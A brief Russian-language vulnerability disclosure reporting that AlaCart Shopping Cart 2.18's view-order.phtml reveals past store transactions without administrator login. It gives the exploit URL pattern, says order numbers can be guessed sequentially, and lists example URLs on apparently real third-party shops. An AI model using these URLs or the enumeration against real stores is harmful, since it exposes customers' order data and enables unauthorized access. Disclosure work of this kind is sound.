Уязвимость в системе AlaCart Version 2.18
Мною обнаружена уязвимость в системе AlaCart Version 2.18 Application:
Alabanza AlaCart Shopping Cart Exploit: http://www.xxx.com/s-cart/view-order.phtml?f_strFirstName=[любые символы]&f_strLastName=[любые символы]&f_intOrderID= [номер транзакции] Файл view-order.phtml позволяет просмотривать информацию о проведенных ранее транзакциях магазина, минуя ввод пароля/логина администратора. Номер транзакции подбирается обычным перебором 1,2,3...121 и так далее. В случае отсутствия записи о имеющейся транзакции, ответ сервера: Order #135 could not be found or does not exist. Пример: http://alacart.metapros.net/s-cart/view-order.phtml?f_strFirstName=Jeff&f_strLastName=Daggs&f_intOrderID=135 Пример уязвимости: http://notebookmaker.com/s-cart/view-order.phtml?f_strFirstName=aaa&f_strLastName=aaaa&f_intOrderID=129 Твой
bug Durito. |
Дата створення/оновлення: 25.05.2018